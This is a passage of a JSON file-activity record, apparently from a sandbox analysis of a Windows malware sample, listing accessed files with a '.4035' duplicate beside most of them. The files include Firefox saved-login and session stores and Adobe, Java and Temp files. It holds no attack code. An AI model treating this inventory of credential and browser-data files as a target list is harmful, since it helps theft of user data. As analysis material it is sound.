"c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\secmod.db.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\secmod.db", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\secmod.db", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\sessionstore.bak.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\sessionstore.bak.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\sessionstore.bak", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\sessionstore.bak", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\sessionstore.js.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\sessionstore.js.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\sessionstore.js", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\sessionstore.js", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\signons.sqlite.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\signons.sqlite.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\signons.sqlite", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\signons.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\times.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\times.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\times.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\times.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\urlclassifierkey3.txt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\urlclassifierkey3.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\urlclassifierkey3.txt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\urlclassifierkey3.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\webappsstore.sqlite.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\webappsstore.sqlite.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\webappsstore.sqlite", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\webappsstore.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\webapps\\webapps.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\webapps\\webapps.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\webapps\\webapps.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\webapps\\webapps.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\bookmarkbackups\\bookmarks-2017-06-23_5.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\bookmarkbackups\\bookmarks-2017-06-23_5.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\bookmarkbackups\\bookmarks-2017-06-23_5.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\bookmarkbackups\\bookmarks-2017-06-23_5.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_60\\Data1.cab.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\jre1.7.0_60\\data1.cab.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_60\\Data1.cab", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\jre1.7.0_60\\data1.cab", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_60\\jre1.7.0_60.msi.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\jre1.7.0_60\\jre1.7.0_60.msi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_60\\jre1.7.0_60.msi", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\jre1.7.0_60\\jre1.7.0_60.msi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\baseline.versions.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\deployment\\security\\baseline.versions.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\baseline.versions", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\deployment\\security\\baseline.versions", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\blacklist.dynamic.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\deployment\\security\\blacklist.dynamic.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\blacklist.dynamic", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\deployment\\security\\blacklist.dynamic", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\blacklisted.certs.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\deployment\\security\\blacklisted.certs.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\blacklisted.certs", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\deployment\\security\\blacklisted.certs", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\update.timestamp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\deployment\\security\\update.timestamp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\update.timestamp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\deployment\\security\\update.timestamp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\au\\au.cab.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\au\\au.cab", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\au\\au.msi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\au\\au.msi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\GDIPFONTCACHEV1.DAT.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\gdipfontcachev1.dat.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\GDIPFONTCACHEV1.DAT", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\gdipfontcachev1.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\IconCache.db.4035", "hashes": [ { "md5_hash": "10bbe90333794c619387b038e1025124", "sha1_hash": "daadc81e5bff5203214b828977e2977ec755aef3", "sha256_hash": "b5e724b03ca68fbdf1f18394f1237dd8acf8c340ebf1c707fedea2727c927b48", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\iconcache.db.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\IconCache.db", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\iconcache.db", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\2MhJfwFuDN3-e.avi.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\2mhjfwfudn3-e.avi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\2MhJfwFuDN3-e.avi", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\2mhjfwfudn3-e.avi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\2WBQ.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\2wbq.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\2WBQ.mp3", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\2wbq.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\328eb3bb-3513-4376-ad0b-51f56067bb1d.tmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\328eb3bb-3513-4376-ad0b-51f56067bb1d.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\328eb3bb-3513-4376-ad0b-51f56067bb1d.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\328eb3bb-3513-4376-ad0b-51f56067bb1d.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\42234357-29bc-472f-be1a-21a7f646755a.tmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\42234357-29bc-472f-be1a-21a7f646755a.tmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\42234357-29bc-472f-be1a-21a7f646755a.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\42234357-29bc-472f-be1a-21a7f646755a.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\4oYKxbiPGc0ml8LCl.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\4oykxbipgc0ml8lcl.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\4oYKxbiPGc0ml8LCl.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\4oykxbipgc0ml8lcl.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\6mAClKPTOKVQApV-Cql.bmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\6maclkptokvqapv-cql.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\6mAClKPTOKVQApV-Cql.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\6maclkptokvqapv-cql.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\AdobeARM.log.4035", "hashes": [ { "md5_hash": "7dd2a9ec73191e19652ef70335b4c59f", "sha1_hash": "1878eb93b6b4e7ba4de0a9557ae3ef070281a1ac", "sha256_hash": "8ac7b9d4e5ed532447d3187630ed7b32265e1ba5930611d40b7ce66c9af17a19", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\adobearm.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\AdobeARM.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\adobearm.log", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\AdobeARM_NotLocked.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\adobearm_notlocked.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\AdobeARM_NotLocked.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\adobearm_notlocked.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\ASPNETSetup_00000.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\aspnetsetup_00000.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\ASPNETSetup_00000.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\aspnetsetup_00000.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\ASPNETSetup_00001.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\aspnetsetup_00001.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\ASPNETSetup_00001.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\aspnetsetup_00001.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 